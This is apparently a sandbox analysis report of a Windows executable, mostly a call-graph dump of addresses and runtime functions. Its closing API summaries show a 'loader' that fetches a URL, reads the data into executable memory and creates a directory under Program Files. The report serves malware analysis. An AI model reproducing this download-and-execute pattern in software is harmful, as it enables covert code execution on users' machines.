18886->18740 18888 ed2cee 18887->18888 18889 ed2e08 18887->18889 18973 ed2b40 18888->18973 18908 ed5110 18889->18908 18891 ed2cfb std::runtime_error::runtime_error 18892 ed2d14 InternetOpenUrlA 18891->18892 18893 ed5110 task 39 API calls 18892->18893 18894 ed2d2a 18893->18894 18895 ed2dfe InternetCloseHandle 18894->18895 18896 ed2b40 40 API calls 18894->18896 18895->18889 18897 ed2d41 18896->18897 18983 ed4af0 18897->18983 18900 ed5110 task 39 API calls 18906 ed2d75 18900->18906 18901 ed2de2 InternetCloseHandle 18902 ed2e20 70 API calls 18901->18902 18902->18895 18903 ed2d98 InternetReadFile 18904 ed2dd7 18903->18904 18903->18906 18905 ed4a40 71 API calls 18904->18905 18905->18901 18906->18901 18906->18903 18906->18904 18907 ed4c50 68 API calls 18906->18907 18907->18906 19041 ed6530 18908->19041 18910 ed511f task 18910->18746 18912 ed66b0 std::runtime_error::runtime_error char_traits 18911->18912 18915 ed66d0 18912->18915 18914 ed66c9 18914->18886 18916 ed6728 18915->18916 18918 ed66e4 std::ios_base::failure::failure task std::runtime_error::runtime_error 18915->18918 18919 ed7fd0 18916->18919 18918->18914 18920 ed7fe1 std::ios_base::failure::failure 18919->18920 18922 ed7feb std::ios_base::failure::failure task 18920->18922 18927 ed1550 18920->18927 18930 ed7440 18922->18930 18924 ed801d std::ios_base::failure::failure task std::runtime_error::runtime_error 18926 ed8072 std::ios_base::failure::failure 18924->18926 18934 ed7470 18924->18934 18926->18918 18937 ed909d 18927->18937 18931 ed7450 allocator 18930->18931 18948 ed8270 18931->18948 18965 ed8200 18934->18965 18936 ed7484 18936->18926 18942 ed8fcc 18937->18942 18941 ed90bc 18943 ed11b0 std::exception::exception 39 API calls 18942->18943 18944 ed8fde 18943->18944 18945 edb0a3 18944->18945 18946 edb0bd 18945->18946 18947 edb0ea RaiseException 18945->18947 18946->18947 18947->18941 18949 ed827c 18948->18949 18950 ed828a 18948->18950 18957 ed8a30 18949->18957 18953 ed7459 18950->18953 18954 ed1490 18950->18954 18953->18924 18955 ed9c52 std::_Facet_Register RaiseException EnterCriticalSection LeaveCriticalSection 18954->18955 18956 ed149c 18955->18956 18956->18953 18958 ed8a4c 18957->18958 18959 ed8a47 18957->18959 18961 ed1490 _Allocate RaiseException EnterCriticalSection LeaveCriticalSection 18958->18961 18960 ed1400 Concurrency::cancel_current_task RaiseException 18959->18960 18960->18958 18964 ed8a55 18961->18964 18962 ee122d _Allocate 39 API calls 18962->18964 18963 ed8a70 18963->18953 18964->18962 18964->18963 18966 ed822e shared_ptr 18965->18966 18967 ed8221 18965->18967 18966->18936 18969 ed14b0 18967->18969 18970 ed14ee 18969->18970 18971 ee122d _Allocate 39 API calls 18970->18971 18972 ed1509 18970->18972 18971->18970 18972->18966 18974 ed2b6b task 18973->18974 18987 ed4e40 18974->18987 18976 ed2b93 std::runtime_error::runtime_error 18977 ed2c20 std::ios_base::failure::failure 18976->18977 18994 ed4fa0 18976->18994 18991 ed4e20 18977->18991 18980 ed5110 task 39 API calls 18981 ed2c97 18980->18981 18981->18891 18984 ed4b0b std::runtime_error::runtime_error 18983->18984 18985 ed4b50 80 API calls 18984->18985 18986 ed2d69 18985->18986 18986->18900 18988 ed4e5a 18987->18988 18998 ed7db0 18988->18998 18990 ed4e6a 18990->18976 18992 ed6370 Concurrency::cancellation_token_source::~cancellation_token_source 39 API calls 18991->18992 18993 ed2c88 18992->18993 18993->18980 18995 ed5004 18994->18995 18997 ed4fbd task std::runtime_error::runtime_error 18994->18997 19033 ed7e60 18995->19033 18997->18976 18999 ed7deb std::ios_base::failure::failure 18998->18999 19000 ed7e3c task 18999->19000 19004 ed8680 18999->19004 19000->18990 19002 ed7dfd 19010 ed82b0 19002->19010 19005 ed868f 19004->19005 19006 ed8699 19005->19006 19018 ed87e0 19005->19018 19014 ed8890 19006->19014 19011 ed82bf 19010->19011 19012 ed82c9 19010->19012 19026 ed6370 19011->19026 19012->19000 19015 ed88c3 task 19014->19015 19021 ed89d0 19015->19021 19019 ed909d std::_Xinvalid_argument 40 API calls 19018->19019 19020 ed87ed 19019->19020 19020->19006 19022 ed8c30 allocator RaiseException 19021->19022 19023 ed89e0 19022->19023 19024 ed8270 _Allocate 40 API calls 19023->19024 19025 ed86a5 19024->19025 19025->19002 19028 ed63b4 task Concurrency::cancellation_token_source::~cancellation_token_source 19026->19028 19027 ed63f3 19027->19012 19028->19027 19030 ed7240 19028->19030 19031 ed8200 allocator 39 API calls 19030->19031 19032 ed7257 19031->19032 19032->19027 19034 ed7e80 std::ios_base::failure::failure 19033->19034 19035 ed1550 std::ios_base::failure::failure 40 API calls 19034->19035 19036 ed7e8d std::ios_base::failure::failure task 19034->19036 19035->19036 19037 ed7440 allocator 40 API calls 19036->19037 19038 ed7ec8 task std::runtime_error::runtime_error 19037->19038 19039 ed7470 allocator 39 API calls 19038->19039 19040 ed7f37 std::ios_base::failure::failure 19038->19040 19039->19040 19040->18997 19042 ed6556 task ctype 19041->19042 19043 ed659a task 19042->19043 19044 ed7470 allocator 39 API calls 19042->19044 19043->18910 19044->19043 19046 ed623b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 19045->19046 19066 ed71b0 19046->19066 19049 ed5eb0 19277 ed6fe0 19049->19277 19051 ed5ed4 19282 ed5c90 19051->19282 19053 ed4bf9 19054 ed5dd0 19053->19054 19055 ed5dfb 19054->19055 19061 ed5df7 std::ios_base::_Ios_base_dtor 19054->19061 19293 ed96c2 19055->19293 19058 ed5c90 39 API calls 19059 ed5e2a 19058->19059 19303 ed7cb0 19059->19303 19061->18806 19063 ed6314 std::ios_base::good 19062->19063 19514 ed6330 19063->19514 19075 ed2940 19066->19075 19070 ed71dc 19071 ed71f7 19070->19071 19072 ed6300 40 API calls 19070->19072 19073 ed4bbb 19071->19073 19086 ed94dc 19071->19086 19072->19071 19073->19049 19091 ed2750 19075->19091 19081 ed29c6 19082 ed75e0 19081->19082 19083 ed760a std::ios_base::getloc 19082->19083 19187 ed7790 19083->19187 19085 ed7628 std::ios_base::_Ios_base_dtor ctype 19085->19070 19087 ed8f22 std::_Lockit::_Lockit 7 API calls 19086->19087 19088 ed94ec 19087->19088 19089 ed8f7a std::_Lockit::~_Lockit 2 API calls 19088->19089 19090 ed952a 19089->19090 19090->19073 19106 ed26b0 19091->19106 19094 ed9c52 19095 ed9c57 ___std_exception_copy 19094->19095 19096 ed29b2 19095->19096 19097 ee2b49 std::_Facet_Register 2 API calls 19095->19097 19098 ed9c73 std::_Facet_Register 19095->19098 19096->19081 19103 ed1f20 19096->19103 19097->19095 19099 eda2e9 stdext::threads::lock_error::lock_error 19098->19099 19102 edb0a3 Concurrency::cancel_current_task RaiseException 19098->19102 19100 edb0a3 Concurrency::cancel_current_task RaiseException 19099->19100 19101 eda306 19100->19101 19102->19099 19124 ed92c2 19103->19124 19105 ed1f43 19105->19081 19107 ed273c 19106->19107 19108 ed26d9 19106->19108 19107->19094 19109 edb0a3 Concurrency::cancel_current_task RaiseException 19108->19109 19110 ed26ea std::make_error_code 19108->19110 19109->19110 19114 ed2650 19110->19114 19113 edb0a3 Concurrency::cancel_current_task RaiseException 19113->19107 19117 ed1950 19114->19117 19118 ed5180 std::ios_base::failure::failure 40 API calls 19117->19118 19119 ed197a 19118->19119 19120 ed1880 std::ios_base::failure::failure 40 API calls 19119->19120 19121 ed1995 19120->19121 19122 ed5110 task 39 API calls 19121->19122 19123 ed19a4 19122->19123 19123->19113 19125 ed92ce __EH_prolog3 19124->19125 19136 ed8f22 19125->19136 19130 ed92ec 19148 ed944a 19130->19148 19131 ed934a std::locale::_Init 19131->19105 19135 ed930a 19156 ed8f7a 19135->19156 19137 ed8f38 19136->19137 19138 ed8f31 19136->19138 19140 ed8f36 19137->19140 19168 ed9997 EnterCriticalSection 19137->19168 19163 ee1349 19138->19163 19140->19135 19142 ed9427 19140->19142 19143 ed9c52 std::_Facet_Register 3 API calls 19142->19143 19144 ed9432 19143->19144 19145 ed9446 19144->19145 19169 ed9156 19144->19169 19145->19130 19149 ed9456 19148->19149 19151 ed92f4 19148->19151 19172 ed9a1b 19149->19172 19152 ed921a 19151->19152 19153 ed9228 19152->19153 19155 ed9234 ctype ___std_exception_copy 19152->19155 19154 ee07ca ctype 14 API calls 19153->19154 19153->19155 19154->19155 19155->19135 19157 ee1357 19156->19157 19158 ed8f84 19156->19158 19186 ee1332 LeaveCriticalSection 19157->19186 19159 ed8f97 19158->19159 19185 ed99a5 LeaveCriticalSection 19158->19185 19159->19131 19162 ee135e 19162->19131 19164 ee7ffb std::_Lockit::_Lockit 5 API calls 19163->19164 19165 ee134e 19164->19165 19166 ee12ea std::_Lockit::_Lockit EnterCriticalSection 19165->19166 19167 ee1355 19166->19167 19167->19140 19168->19140 19170 ed921a _Yarn 14 API calls 19169->19170 19171 ed9190 19170->19171 19171->19130 19173 ed9a2b EncodePointer 19172->19173 19174 ee1d07 19172->19174 19173->19151 19173->19174 19175 eeb60b __InternalCxxFrameHandler EnterCriticalSection LeaveCriticalSection 19174->19175 19176 ee1d0c 19175->19176 19177 ee1d17 19176->19177 19178 eeb650 __InternalCxxFrameHandler 39 API calls 19176->19178 19179 ee1d21 IsProcessorFeaturePresent 19177->19179 19184 ee1d40 19177->19184 19178->19177 19181 ee1d2d 19179->19181 19180 ee36e7 __InternalCxxFrameHandler 21 API calls 19182 ee1d4a 19180->19182 19183 ee1021 __InternalCxxFrameHandler 8 API calls 19181->19183 19183->19184 19184->19180 19185->19159 19186->19162 19188 ed8f22 std::_Lockit::_Lockit 7 API calls 19187->19188 19189 ed77b5 19188->19189 19201 ed1e00 19189->19201 19191 ed77ce 19200 ed77ec 19191->19200 19207 ed22d0 19191->19207 19192 ed8f7a std::_Lockit::~_Lockit 2 API calls 19194 ed7876 19192->19194 19194->19085 19196 ed7809 19217 ed1b90 19196->19217 19197 ed7810 19221 ed9290 19197->19221 19200->19192 19202 ed1e45 19201->19202 19203 ed1e11 19201->19203 19202->19191 19204 ed8f22 std::_Lockit::_Lockit 7 API calls 19203->19204 19205 ed1e1b 19204->19205 19206 ed8f7a std::_Lockit::~_Lockit 2 API calls 19205->19206 19206->19202 19208 ed22fc 19207->19208 19209 ed2393 19207->19209 19208->19209 19210 ed9c52 std::_Facet_Register 3 API calls 19208->19210 19209->19196 19209->19197 19212 ed230f 19210->19212 19211 ed2357 19211->19209 19236 ed1d00 19211->19236 19212->19211 19224 ed1c30 19212->19224 19218 ed1b9e std::bad_alloc::bad_alloc 19217->19218 19219 edb0a3 Concurrency::cancel_current_task RaiseException 19218->19219 19220 ed1bac 19219->19220 19220->19200 19222 ed9c52 std::_Facet_Register 3 API calls 19221->19222 19223 ed929b 19222->19223 19223->19200 19225 ed8f22 std::_Lockit::_Lockit 7 API calls 19224->19225 19226 ed1c56 _Yarn 19225->19226 19227 ed1cbd 19226->19227 19228 ed1ccf 19226->19228 19253 ed93c2 19227->19253 19262 ed90dd 19228->19262 19231 ed1cca 19232 ed2270 19231->19232 19233 ed2298 std::bad_exception::bad_exception 19232->19233 19267 ed23e0 19233->19267 19270 ed940d 19236->19270 19241 ed4ec0 14 API calls 19242 ed1d3e 19241->19242 19243 ed4ec0 14 API calls 19242->19243 19244 ed1d49 19243->19244 19245 ed4ec0 14 API calls 19244->19245 19246 ed1d54 19245->19246 19247 ed4ec0 14 API calls 19246->19247 19248 ed1d5f 19247->19248 19249 ed4ec0 14 API calls 19248->19249 19250 ed1d6a 19249->19250 19251 ed8f7a std::_Lockit::~_Lockit 2 API calls 19250->19251 19252 ed1d72 19251->19252 19252->19209 19254 ee15c0 std::_Locinfo::_Locinfo_dtor 46 API calls 19253->19254 19255 ed93ce 19254->19255 19256 ed921a _Yarn 14 API calls 19255->19256 19257 ed93e6 19256->19257 19258 ee15c0 std::_Locinfo::_Locinfo_dtor 46 API calls 19257->19258 19259 ed93f6 19257->19259 19258->19259 19260 ed921a _Yarn 14 API calls 19259->19260 19261 ed940a 19260->19261 19261->19231 19263 ed9040 std::invalid_argument::invalid_argument 39 API calls 19262->19263 19264 ed90ee 19263->19264 19265 edb0a3 Concurrency::cancel_current_task RaiseException 19264->19265 19266 ed90fc 19265->19266 19266->19231 19268 ed1d90 std::_Locinfo::_Getctype 39 API calls 19267->19268 19269 ed22b4 19268->19269 19269->19211 19271 ed9419 19270->19271 19272 ed1d25 19270->19272 19273 ee15c0 std::_Locinfo::_Locinfo_dtor 46 API calls 19271->19273 19274 ed4ec0 19272->19274 19273->19272 19275 ed64e0 14 API calls 19274->19275 19276 ed1d33 19275->19276 19276->19241 19278 ed9c52 std::_Facet_Register 3 API calls 19277->19278 19279 ed6ff9 19278->19279 19280 ed1f20 44 API calls 19279->19280 19281 ed700d 19279->19281 19280->19281 19281->19051 19283 ed5c9f 19282->19283 19284 ed5d00 19283->19284 19286 ede630 19283->19286 19284->19053 19287 ede63c 19286->19287 19288 ede651 19286->19288 19289 ee1de8 __dosmaperr 14 API calls 19287->19289 19288->19284 19290 ede641 19289->19290 19291 ee121d ___std_exception_copy 39 API calls 19290->19291 19292 ede64c 19291->19292 19292->19284 19295 ed961c 19293->19295 19294 ed5e0c 19294->19058 19294->19061 19295->19294 19296 ed967d 19295->19296 19299 ed96cb 42 API calls 19295->19299 19301 ed9684 19296->19301 19317 ed96cb 19296->19317 19299->19296 19301->19294 19326 ede387 19301->19326 19304 ed8f22 std::_Lockit::_Lockit 7 API calls 19303->19304 19305 ed7cd5 19304->19305 19306 ed1e00 int 9 API calls 19305->19306 19307 ed7cee 19306->19307 19316 ed7d0c 19307->19316 19506 ed8350 19307->19506 19308 ed8f7a std::_Lockit::~_Lockit 2 API calls 19310 ed7d96 19308->19310 19310->19061 19312 ed7d29 19314 ed1b90 Concurrency::cancel_current_task RaiseException 19312->19314 19313 ed7d30 19315 ed9290 std::_Facet_Register 3 API calls 19313->19315 19314->19316 19315->19316 19316->19308 19332 ee16af 19317->19332 19320 ee0fbe 19321 ee0fd1 _Fputc 19320->19321 19389 ee0d15 19321->19389 19324 eddccb _Fputc 39 API calls 19325 ee0ff3 19324->19325 19325->19301 19327 ede39a _Fputc 19326->19327 19457 ede262 19327->19457 19329 ede3a6 19330 eddccb _Fputc 39 API calls 19329->19330 19331 ede3b2 19330->19331 19331->19294 19333 ee15f8 ___scrt_is_nonwritable_in_current_image 19332->19333 19334 ee160b 19333->19334 19336 ee162b 19333->19336 19335 ee1de8 __dosmaperr 14 API calls 19334->19335 19337 ee1610 19335->19337 19338 ee163d 19336->19338 19339 ee1630 19336->19339 19340 ee121d ___std_exception_copy 39 API calls 19337->19340 19349 ee754f 19338->19349 19341 ee1de8 __dosmaperr 14 API calls 19339->19341 19348 ed969d 19340->19348 19341->19348 19344 ee164d 19346 ee1de8 __dosmaperr 14 API calls 19344->19346 19345 ee165a 19357 ee1698 19345->19357 19346->19348 19348->19294 19348->19320 19350 ee755b ___scrt_is_nonwritable_in_current_image 19349->19350 19361 ee12ea EnterCriticalSection 19350->19361 19352 ee7569 19362 ee75f3 19352->19362 19358 ee169c 19357->19358 19388 ede68a LeaveCriticalSection 19358->19388 19360 ee16ad 19360->19348 19361->19352 19370 ee7616 19362->19370 19363 ee7576 19376 ee75af 19363->19376 19364 ee766e 19365 ee788f __dosmaperr 14 API calls 19364->19365 19366 ee7677 19365->19366 19368 ee7311 ___free_lconv_mon 14 API calls 19366->19368 19369 ee7680 19368->19369 19369->19363 19381 ee7ea0 19369->19381 19370->19363 19370->19364 19370->19370 19379 ede676 EnterCriticalSection 19370->19379 19380 ede68a LeaveCriticalSection 19370->19380 19387 ee1332 LeaveCriticalSection 19376->19387 19378 ee1646 19378->19344 19378->19345 19379->19370 19380->19370 19382 ee7b91 std::_Lockit::_Lockit 5 API calls 19381->19382 19383 ee7ebc 19382->19383 19384 ee7eda InitializeCriticalSectionAndSpinCount 19383->19384 19385 ee769f 19383->19385 19384->19385 19387->19378 19388->19360 19391 ee0d21 ___scrt_is_nonwritable_in_current_image 19389->19391 19390 ee0d27 19392 ee11a0 _Fputc 29 API calls 19390->19392 19391->19390 19393 ee0d6a 19391->19393 19394 ee0d42 19392->19394 19400 ede676 EnterCriticalSection 19393->19400 19394->19324 19396 ee0d76 19401 ee0e98 19396->19401 19398 ee0d8c 19410 ee0db5 19398->19410 19400->19396 19402 ee0ebe 19401->19402 19403 ee0eab 19401->19403 19413 ee0dbf 19402->19413 19403->19398 19405 ee0f6f 19405->19398 19406 ee0ee1 19406->19405 19417 ede138 19406->19417 19456 ede68a LeaveCriticalSection 19410->19456 19412 ee0dbd 19412->19394 19414 ee0dd0 19413->19414 19415 ee0e28 19413->19415 19414->19415 19426 eea37e 19414->19426 19415->19406 19427 eea392 _Fputc 19426->19427 19456->19412 19458 ede26e ___scrt_is_nonwritable_in_current_image 19457->19458 19459 ede278 19458->19459 19460 ede29b 19458->19460 19461 ee11a0 _Fputc 29 API calls 19459->19461 19462 ede293 19460->19462 19468 ede676 EnterCriticalSection 19460->19468 19461->19462 19462->19329 19464 ede2b9 19469 ede2f9 19464->19469 19466 ede2c6 19483 ede2f1 19466->19483 19468->19464 19470 ede329 19469->19470 19471 ede306 19469->19471 19473 ede138 ___scrt_uninitialize_crt 64 API calls 19470->19473 19482 ede321 19470->19482 19472 ee11a0 _Fputc 29 API calls 19471->19472 19472->19482 19474 ede341 19473->19474 19486 ee76b5 19474->19486 19477 ee5c52 _Fgetc 39 API calls 19478 ede355 19477->19478 19490 ee73dc 19478->19490 19481 ee7311 ___free_lconv_mon 14 API calls 19481->19482 19482->19466 19505 ede68a LeaveCriticalSection 19483->19505 19485 ede2f7 19485->19462 19487 ee76cc 19486->19487 19488 ede349 19486->19488 19487->19488 19489 ee7311 ___free_lconv_mon 14 API calls 19487->19489 19488->19477 19489->19488 19491 ee7405 19490->19491 19496 ede35c 19490->19496 19492 ee7454 19491->19492 19494 ee742c 19491->19494 19493 ee11a0 _Fputc 29 API calls 19492->19493 19493->19496 19497 ee734b 19494->19497 19496->19481 19496->19482 19505->19485 19507 ed837c 19506->19507 19508 ed7d21 19506->19508 19507->19508 19509 ed9c52 std::_Facet_Register 3 API calls 19507->19509 19508->19312 19508->19313 19510 ed838f 19509->19510 19512 ed1c30 48 API calls 19510->19512 19513 ed83b3 19510->19513 19511 ed1d00 47 API calls 19511->19508 19512->19513 19513->19508 19513->19511 19515 ed6342 19514->19515 19516 ed26b0 std::ios_base::clear 40 API calls 19515->19516 19517 ed6320 19516->19517 19517->18807 19519 ed5d72 19518->19519 19525 ed5da2 19518->19525 19526 ed5b80 19519->19526 19520 ed5c90 39 API calls 19522 ed4a52 19520->19522 19522->18812 19522->18813 19524 ede387 69 API calls 19524->19525 19525->19520 19527 ed5b9d 19526->19527 19528 ed5b92 codecvt char_traits 19526->19528 19527->19524 19528->19527 19530 ede963 19528->19530 19531 ede976 _Fputc 19530->19531 19536 ede745 19531->19536 19533 ede98b 19534 eddccb _Fputc 39 API calls 19533->19534 19535 ede998 19534->19535 19535->19527 19537 ede77b 19536->19537 19538 ede753 19536->19538 19537->19533 19538->19537 19539 ede760 19538->19539 19540 ede782 19538->19540 19542 ee11a0 _Fputc 29 API calls 19539->19542 19544 ede69e 19540->19544 19542->19537 19545 ede6aa ___scrt_is_nonwritable_in_current_image 19544->19545 19552 ede676 EnterCriticalSection 19545->19552 19547 ede6b8 19553 ede6f9 19547->19553 19552->19547 19563 ee8165 19553->19563 19564 ee8127 39 API calls 19563->19564 19566 ee8176 19564->19566 19585 ed59fb Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 19584->19585 19586 ed71b0 51 API calls 19585->19586 19587 ed368b 19586->19587 19587->18818 19883 ed3d30 19880->19883 19881 ed6190 19881->18864 19884 ed3d42 19883->19884 19886 ed3d5b std::ios_base::failure::failure 19883->19886 19884->19881 19885 ede963 67 API calls 19885->19884 19886->19884 19886->19885 20258 ee5c79 20259 ee5c52 _Fgetc 39 API calls 20258->20259 20261 ee5c86 20259->20261 20260 ee5c92 20261->20260 20265 ee5cde 20261->20265 20281 ee5e41 20261->20281 20265->20260 20269 ee5d40 20265->20269 20289 ee8127 20265->20289 20266 ee5d33 20266->20269 20296 ee979b 20266->20296 20270 ee5d6f 20269->20270 20271 ee5c52 _Fgetc 39 API calls 20270->20271 20272 ee5d7e 20271->20272 20273 ee5e24 20272->20273 20274 ee5d91 20272->20274 20275 ee6fe4 __wsopen_s 64 API calls 20273->20275 20276 ee5dae 20274->20276 20278 ee5dd5 20274->20278 20279 ee5d51 20275->20279 20277 ee6fe4 __wsopen_s 64 API calls 20276->20277 20277->20279 20278->20279 20301 eea320 20278->20301 20282 ee5e5b 20281->20282 20283 ee5e57 20281->20283 20284 eef3b6 __wsopen_s 39 API calls 20282->20284 20288 ee5eaa 20282->20288 20283->20265 20285 ee5e7c 20284->20285 20286 ee5e84 SetFilePointerEx 20285->20286 20285->20288 20287 ee5e9b GetFileSizeEx 20286->20287 20286->20288 20287->20288 20288->20265 20290 ee8133 20289->20290 20291 ee815d 20290->20291 20292 ee5c52 _Fgetc 39 API calls 20290->20292 20291->20266 20293 ee814e 20292->20293 20294 ef1cf0 __fread_nolock 39 API calls 20293->20294 20295 ee8154 20294->20295 20295->20266 20297 ee788f __dosmaperr 14 API calls 20296->20297 20298 ee97b8 20297->20298 20299 ee7311 ___free_lconv_mon 14 API calls 20298->20299 20300 ee97c2 20299->20300 20300->20269 20302 eea334 _Fputc 20301->20302 20307 eea178 20302->20307 20305 eddccb _Fputc 39 API calls 20306 eea358 20305->20306 20306->20279 20308 eea184 ___scrt_is_nonwritable_in_current_image 20307->20308 20309 eea1c7 20308->20309 20311 eea20d 20308->20311 20317 eea18c 20308->20317 20310 ee11a0 _Fputc 29 API calls 20309->20310 20310->20317 20318 eef13a EnterCriticalSection 20311->20318 20313 eea213 20314 eea234 20313->20314 20315 eea29d __fread_nolock 41 API calls 20313->20315 20319 eea295 20314->20319 20315->20314 20317->20305 20318->20313 20322 eef1ef LeaveCriticalSection 20319->20322 20321 eea29b 20321->20317 20322->20321 23383 ef172a 23384 ef1743 23383->23384 23385 ef1761 23383->23385 23384->23385 23386 ee65b0 2 API calls 23384->23386 23386->23384 21860 ed4420 21861 ed4430 char_traits 21860->21861 21862 ed44c1 21861->21862 21863 ed44ff codecvt 21861->21863 21867 ed444a char_traits 21861->21867 21870 ed2ac0 21862->21870 21865 ed4556 21863->21865 21866 ed454e 21863->21866 21865->21867 21868 ede963 67 API calls 21865->21868 21866->21867 21869 ed2ac0 _Fputc 41 API calls 21866->21869 21868->21867 21869->21867 21873 eddecb 21870->21873 21874 eddede _Fputc 21873->21874 21879 eddd07 21874->21879 21876 eddeed 21877 eddccb _Fputc 39 API calls 21876->21877 21878 ed2ad2 21877->21878 21878->21867 21880 eddd13 ___scrt_is_nonwritable_in_current_image 21879->21880 21881 eddd1c 21880->21881 21882 eddd40 21880->21882 21883 ee11a0 _Fputc 29 API calls 21881->21883 21893 ede676 EnterCriticalSection 21882->21893 21885 eddd35 _Fgetc 21883->21885 21885->21876 21886 eddd49 21887 ee5c52 _Fgetc 39 API calls 21886->21887 21892 eddd5e 21886->21892 21887->21892 21888 edddca 21890 ee11a0 _Fputc 29 API calls 21888->21890 21889 edddfb _Fputc 21894 edde33 21889->21894 21890->21885 21892->21888 21892->21889 21893->21886 21897 ede68a LeaveCriticalSection 21894->21897 21896 edde39 21896->21885 21897->21896 22929 ed4620 22930 ed4630 22929->22930 22932 ed463c 22929->22932 22933 ede676 EnterCriticalSection 22930->22933 22933->22932 21916 ee3c38 21919 ee3904 21916->21919 21920 ee3910 ___scrt_is_nonwritable_in_current_image 21919->21920 21927 ee12ea EnterCriticalSection 21920->21927 21922 ee3948 21928 ee3966 21922->21928 21923 ee391a 21923->21922 21925 ef03ff __Getctype 14 API calls 21923->21925 21925->21923 21927->21923 21931 ee1332 LeaveCriticalSection 21928->21931 21930 ee3954 21931->21930 23411 ed3b30 23412 ed3b3f 23411->23412 23414 ed3b85 23412->23414 23417 ee0790 23412->23417 23416 ed5c90 39 API calls 23416->23414 23418 ee07a3 _Fputc 23417->23418 23423 ee06c7 23418->23423 23420 ee07b8 23421 eddccb _Fputc 39 API calls 23420->23421 23422 ed3b7e 23421->23422 23422->23414 23422->23416 23424 ee06fc 23423->23424 23425 ee06d9 23423->23425 23424->23425 23428 ee0723 23424->23428 23426 ee11a0 _Fputc 29 API calls 23425->23426 23427 ee06f4 23426->23427 23427->23420 23431 ee05cc 23428->23431 23432 ee05d8 ___scrt_is_nonwritable_in_current_image 23431->23432 23439 ede676 EnterCriticalSection 23432->23439 23434 ee05e6 23440 ee0627 23434->23440 23436 ee05f3 23449 ee061b 23436->23449 23439->23434 23441 ede138 ___scrt_uninitialize_crt 64 API calls 23440->23441 23442 ee0642 23441->23442 23443 ee76b5 14 API calls 23442->23443 23444 ee064c 23443->23444 23445 ee788f __dosmaperr 14 API calls 23444->23445 23446 ee0667 23444->23446 23447 ee068b 23445->23447 23446->23436 23448 ee7311 ___free_lconv_mon 14 API calls 23447->23448 23448->23446 23452 ede68a LeaveCriticalSection 23449->23452 23451 ee0604 23451->23420 23452->23451

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00ED2EE0: CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Everything,00000000), ref: 00ED2F05
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2F47
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2F56
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2F97
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2FA6
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED2FF6
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED3008
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED3058
                                                                                • Part of subcall function 00ED2EE0: task.LIBCPMTD ref: 00ED306A
                                                                              • Sleep.KERNELBASE(00000BB8,?,00EF7223,000000FF), ref: 00ED317C
                                                                              • InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 00ED319D
                                                                              • InternetOpenUrlA.WININET(00000000,00F0375C,00000000,00000000,80000000,00000000), ref: 00ED31DD
                                                                              • InternetCloseHandle.WININET(?), ref: 00ED320E
                                                                              • InternetCloseHandle.WININET(?), ref: 00ED3271
                                                                              • InternetCloseHandle.WININET(?), ref: 00ED327B
                                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00ED329C
                                                                              • InternetCloseHandle.WININET(00000000), ref: 00ED32D6
                                                                              • fpos.LIBCPMTD ref: 00ED3368
                                                                              • fpos.LIBCPMTD ref: 00ED337D
                                                                              • fpos.LIBCPMTD ref: 00ED33AD
                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000040,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00F034E4,00000024,00000040), ref: 00ED33B5
                                                                              • fpos.LIBCPMTD ref: 00ED33E5
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00ED3414
                                                                              • InternetCloseHandle.WININET(00000000), ref: 00ED32E0
                                                                                • Part of subcall function 00ED7890: char_traits.LIBCPMTD ref: 00ED78BD
                                                                                • Part of subcall function 00ED7890: char_traits.LIBCPMTD ref: 00ED7A17
                                                                                • Part of subcall function 00ED7890: char_traits.LIBCPMTD ref: 00ED7AFC
                                                                                • Part of subcall function 00ED37F0: fpos.LIBCPMTD ref: 00ED389A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Internettask$CloseHandlefpos$char_traits$OpenVirtual$AllocCreateDirectoryFileFreeReadSleep
                                                                              • String ID: error$error$error$error$error $loader
                                                                              • API String ID: 3533587409-2811226954
                                                                              • Opcode ID: 90623fcc02bbacc4faf71c614485c43fc70527361087623772710eeb55674da9
                                                                              • Instruction ID: 234c4a9ebf3fa28a7d78422f27dbb416533401572e9bcf8b5d112876079abebf
                                                                              • Opcode Fuzzy Hash: 90623fcc02bbacc4faf71c614485c43fc70527361087623772710eeb55674da9
                                                                              • Instruction Fuzzy Hash: 4481A3B4E40204ABCB14EBA0DC56FEE77B5EF54700F50511AF141BA2C1EFB45A4ADBA1

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNELBASE(C:\Program Files (x86)\Everything,00000000), ref: 00ED2F05
                                                                                • Part of subcall function 00ED2CB0: InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00ED2CDB
                                                                                • Part of subcall function 00ED2CB0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00ED2D19
                                                                                • Part of subcall function 00ED2CB0: task.LIBCPMTD ref: 00ED2D25
                                                                                • Part of subcall function 00ED2CB0: task.LIBCPMTD ref: 00ED2D70
